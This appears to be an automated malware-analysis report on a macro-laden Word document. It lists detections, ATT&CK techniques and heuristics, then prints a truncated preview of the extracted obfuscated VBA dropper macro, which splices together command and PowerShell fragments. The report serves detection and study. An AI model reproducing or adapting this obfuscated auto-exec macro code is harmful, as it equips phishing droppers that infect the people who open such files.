Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, which fires a critical heuristic indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic, which flags auto-execution combined with execution tokens. The ClamAV detections 'Img.Dropper.PhishingLure-6443153-0' and 'Doc.Trojan.Obfuscated-6443078-0' confirm its malicious nature and suggest it acts as a dropper for other malware.
Heuristics 7
- ClamAV: Img.Dropper.PhishingLure-6443153-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 80504 bytes |

SHA-256: d90155808ced037f6784b3c18ab2723cfb188f5bd1544cdbc72e1f0bbc582ee5
Detection (ClamAV): Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "iwlQGUsNRYV"
Function NpYmCPnj()
On Error Resume Next
wXqrIlbTwzH = ("dbFrvOZsqtYQzIcpHiUuHpNnAScfaFHa")
JDiQDYt = 3901150 - Sqr(PIVZCXZCPH * Fix(iRZtXYLi) + 2575741 / wAOpXqrBvOGSXV) - 193789 * knTLTHw * sZfizrZzG + CDbl(4469393 * Int(3374510) / 1548307 * Tan(1258663)) / ijhBUtFPtDsS / CByte(7658098 - CDbl(KCfqCvwwLM))
wrVGHtL = 392228 - Sqr(pJLADsw * Fix(ImdSnFN) + 5611619 / bljEAmEraGK) - 7566441 * VVzQDwDtAzT * PXYNDwhTSjaVz + CDbl(7872812 * Int(4321388) / 1352029 * Tan(1748112)) / mnNcRISWCRZ / CByte(7473941 - CDbl(mMRlPjdWJdT))
ZjWKVC = Mid(wXqrIlbTwzH, 19, 10)
VoWPWzqS = ("BdwifswrzhuwnHcw%=o^we^ruEGTCcS")
LRMvpKfV = 3173662 - Sqr(zUjCGTVdZ * Fix(wnpKLajM) + 5296960 / JoIFZrts) - 1024362 * KHAWYMrXwn * czKiRZRf + CDbl(6015003 * Int(2787467) / 9725554 * Tan(4173306)) / DJLbdPZ / CByte(5696643 - CDbl(EwrmTmziLP))
CvFrX = 7665064 - Sqr(hpwaHRb * Fix(aGMlzSOA) + 3128647 / hNdEvNniGfjwDi) - 6508242 * WUNAVzwRzzjFpB * wSQiaccukn + CDbl(5687520 * Int(2156340) / 9211620 * Tan(6105600)) / DdDzvunPYjP / CByte(2291249 - CDbl(zdhoFIhi))
XOfKzCz = Mid(VoWPWzqS, 15, 10)
cAPbjQCY = ("HnjEwljLVvfGHh%=p&&set %YLtiJsiIBWvimjzpUAsvDD")
uFDkNMjzw = 6775563 - Sqr(jaqGHbWWawbcq * Fix(zdQzmQatZnuXV) + 5621436 / AzMpkmfNaHLz) - 1191711 * HjcQMBh * ADSTqBCLkGtn + CDbl(5072756 * Int(9946815) / 2829255 * Tan(7357068)) / CSQqqbRT / CByte(8125408 - CDbl(ESGJbBPzJ))
qPKKMcFtcSk = 4426253 - Sqr(vdKOWFFSc * Fix(UqKJjQuJ) + 5531482 / zAjztdz) - 3441630 * LAFPpHoFcTVL * NKkbwzr + CDbl(7109558 * Int(4009219) / 8030603 * Tan(6207837)) / RvtNVtHnfR / CByte(1325693 - CDbl(bUCvKSpGp))
kAGGDYnUvZn = Mid(cAPbjQCY, 12, 13)
MDmTPnopOkV = ("HJcMbLEQaNH%=DwEEILqvzjsWp")
Zzvhj = 9657470 - Sqr(mJKkDnlp * Fix(roaaHCoGkW) + 2808169 / zYsjTwZS) - 9696791 * jckQDtZoj * pwoSWhjjsI + CDbl(1312347 * Int(9277866) / 6849307 * Tan(9021513)) / lRDjrMWViFzpr / CByte(9724962 - CDbl(jwpsWwjaKmNqZq))
uBzhzXnfwv = 1189119 - Sqr(spaScWEpJTdKN * Fix(rrkwbKGrYr) + 312618 / swdVzfYRFzQfR) - 2050011 * AiDVZNmvVFaPw * BRjQmdILnVzl + CDbl(9143964 * Int(3661145) / 8444850 * Tan(5224299)) / hQSGIUV / CByte(5421918 - CDbl(GBHQWQckDij))
nwNHCmtczlT = Mid(MDmTPnopOkV, 9, 5)
YLSwHizB = ("tsJwhJwzc XzfzdNTTiLiJAGjEwzspd")
tjjPJq = 1662649 - Sqr(QKAEYbPfYF * Fix(qEIKDjFMDkBD) + 206982 / aCZYaVtOKZT) - 1232773 * UYwMrpbpFHquAC * FmPGzZzZpGz + CDbl(7056849 * Int(7711179) / 5346766 * Tan(8890088)) / qzjkoGYJOZpV / CByte(9057843 - CDbl(iaSPJYJNGaWz))
BXoaH = 1283658 - Sqr(tEnNKYA * Fix(QSpwNFsajciGcX) + 3546893 / SVZdqJOpAS) - 3236150 * mcKWjhJA * KKEVjquVAc + CDbl(4129447 * Int(7309616) / 2774208 * Tan(8993175)) / zXGHEAwvohoGR / CByte(1447479 - CDbl(vOSzHLVIKS))
dizRzdh = Mid(YLSwHizB, 10, 14)
hBpVwzBFD = ("ulvfcndJSkSaNMRjitEtvamz=^he^l^l&&set VErpT")
lVEEpiS = 1097714 - Sqr(YczFFHiEqNpwKh * Fix(mjrqYJdDvtGU) + 619019 / VDAHSUmM) - 3228973 * TjcmFXwnGK * oCnhjvYBMwmauV + CDbl(1916585 * Int(7874749) / 8297249 * Tan(8531760)) / uZTSWrhqz / CByte(4604296 - CDbl(TNsOhAMaiYNKEa))
NbXLbHFWs = 6346009 - Sqr(hRviFut * Fix(WVkRpCEbd) + 2914176 / ZijnJcQKohO) - 2763134 * pmAYCprYUcrMQ * kjUmjpvHWAimGo + CDbl(7077232 * Int(1075525) / 6706735 * Tan(1443572)) / rcDCfZoX / CByte(1097721 - CDbl(Gobthjd))
hCJPO = Mid(hBpVwzBFD, 25, 14)
REBOJpF = ("wnnlIuwbLZDqmjiznczXOTwhRZITpUjB")
lcaHNpTi = 3117930 - Sqr(muXkNHtwrrHYb * Fix(BHhRuiLzAoZ) + 4392770 / ZwnGCKLRsbnzwO) - 6569997 * SAiicjTHwvlj * uiKqITCElENQM + CDbl(1627227 * Int(6125031) / 8825598 * Tan(3619199)) / QdQhnqsWqcfHGZ / CByte(5954376 - CDbl(wtcIoufchwV))
wwSHvjSRp = 2694766 - Sqr(anNjwVCXM * Fix(UwmdZYdzoljJmR) + 2004704 / VzoArViF) - 2998920 * SbIEcElzIKCRG * DwhcjRB + CDbl(9368245 * Int(4181731) / 8055762 * Tan(9919517)) / jMDwTjN / CByte(7138529 - CDbl(CpjJfXo))
HwdzqbZbv = Mid(REBOJpF, 4, 10)
cwKTwh
```
... (truncated)